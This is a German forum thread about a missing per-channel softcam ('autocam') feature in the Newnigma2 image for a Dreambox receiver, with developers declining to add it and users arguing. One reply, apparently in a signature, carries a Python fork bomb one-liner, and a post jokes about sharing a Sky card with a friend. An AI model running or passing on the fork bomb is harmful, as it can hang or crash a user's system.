Autocam

• Hallo,

ich habe seit einigen Tagen eine Dreambox 800c.

Nach einem Vergleich zwischen Gemini 4.6 und Newnigma2, würde ich gerne beim letzteren bleiben.
      Es gibt allerdings eine Sache die mir bei Gemini sehr gut gefällt, die Möglichkeit den Sendern verschiedene Cams zuzuordnen. Das manuelle umschalten beim Newnigma2 funktioniert zwar, doch spätestens bei unbeaufsichtigten Aufnahmen(längerer Urlaub z.B.) sehe ich probleme aufkommen.

Gibt es inzwischen ein Plugin, oder muss man da zu Gemini greifen?

Gruß
      pitxxx
    • ahja also mal ganz ehrlich sowas gibts hier net und wird es nicht geben weil das unsinn ist.
      Es setzt patcherei an enigma voraus was wir hier keinesfalls machen und den sinn einer solchen funktion versteh ich überhaupt net.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Naja, das sehe ich anders, ich bin bei einem privaten Kabelnetzbetreiber und habe 1 Karte für Sky und eine für das Angebot des Betreibers(wegen der ausländischen Sender Interessant), was ist jetzt daran Unsinn wenn ein externer Kartenlesen angeschafft wird und ich nicht mehr die Cams manuell umstellen möchte?Es gibt neben mir noch andere Nutzer, die dieses Feature zu schätzen wissen.
    • Die benutzen sicher alle das Gemini-Image.... :)

Die Funktion gibts dort.
      War für mich widerum Unsinnig... weil ich's nicht brauche.
      (Wie wohl die wenigsten hier)

Ein gepatchtes Enigma2 nur für diesen Zweck.... ?

Also ich find das Newnigma2 gut... so wie es ist.

Und wie oft fährst Du denn in Urlaub... ? 3 Wochen im Jahr ? 4 Wochen ? :D
    • Original von pitxxx
      Naja, das sehe ich anders, ich bin bei einem privaten Kabelnetzbetreiber und habe 1 Karte für Sky und eine für das Angebot des Betreibers(wegen der ausländischen Sender Interessant), was ist jetzt daran Unsinn wenn ein externer Kartenlesen angeschafft wird und ich nicht mehr die Cams manuell umstellen möchte?Es gibt neben mir noch andere Nutzer, die dieses Feature zu schätzen wissen.

Wozu brauchst du denn 2 verschiedene EMUs für die Karten ?
    • Ich wollte doch nur wissen ob es diese Möglichkeit gibt, keine Diskussion über Sinn und Zweck auslösen.

Ich gehe davon aus das mein Sky Abo weiterhin mit CCCam läuft und für Kabelkiosk eine andere Emu benötigt wird. Momentan läuft die Karte in meinem Topfield HD7700, welcher aber einem externen Kartenleser weichen soll, sobald ich mich an die Dreambox gewöhnt habe und die Konfiguration meinen wünschen nach konfiguriert ist(bei der Timeshift Location bekomme ich ständig die Meldung fehlerhafter Ordner und kann meine USB Platte nicht anwählen,Aufnahme klappt hingegen perfekt).

Gruß
      pitxxx
    • Schade, dass hier sehr wohl auch andere interessierende Fragen nach einem Autocam, derart arrogant und frech abgeschmiert werden.
      Bevor auch ich mich beleidigen lassen muss, verabschiede ich lieber aus diesem Forum und wende mich an Andere, wo man fruendlichere Antworten erhält!!
    • Es wurde hier nur gesagt dass es das nicht geben wird in Newnigma2.

Dann kam aber aber ein "ja aber......" - Posting vom Threradersteller.

Daraufhin kam NOCHMAL die Antwort... "Gibts nicht"

Was ist daran arrogant ?

Du solltest nicht vergessen, dass die Leute hier ihre Freizeit opfern um an dem image zu basteln.
      Und WAS sie machen... bleibt immer noch ihnen überlassen.
      Es ist ihre Freizeit und ihr Projekt.

Wenn Dir das nicht gefällt.. musst Du halt gehen.
      Aber das tust Du ja.

Nun denn.

Bye.
    • folgendes szenario geht mir gerade durch den kopf:
      du hast eine 8k und willst eine sendung von sky aufzeichnen (card1 bzw. emu1).
      gleichzeitig willst du noch bundesliga von deiner sky-karte bei deinem kumpel glotzen der bei dir im share mit dran hängt (card1 bzw. emu1)......
      du köpfst gerade die erste *halbe* bei deinem kumpel, als deine olle nach hause kommt und auf einen sender der *card2 bzw. emu2* schaltet.... oweia
      wenn ich mir gerade den code dazu überlege, den es braucht um so etwas ""richtig"" abzufangen wird mir richtig schlecht.
      dir wird wohl schon schlecht sein von den *sehr gut aufgelegten kumpels*....
      wer will so etwas haben? noch dazu müsste man enigma2 dazu patchen was hier aber grundsätzlich niemand tut!
      du fühlst dich beleidigt? arrogant und frech abgeschmiert??? wie das denn?
      soll ich ??

ein sehr verwirrter kami
      cu kami
    • Original von kuwiwi
      Schade, dass hier sehr wohl auch andere interessierende Fragen nach einem Autocam, derart arrogant und frech abgeschmiert werden.
      Bevor auch ich mich beleidigen lassen muss, verabschiede ich lieber aus diesem Forum und wende mich an Andere, wo man fruendlichere Antworten erhält!!

Ich finds ja eher einen Knaller, das er sich fuer so ein Posting erst registriert und dann das Forum dann wieder verlaesst. Aber jedem das Seine. lol
      Aber gerne nochmal zum mitschreiben, wir patchen nichts am Enigma2 und fuer eine solche Funktion muesste extrem rumgepatched werden.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)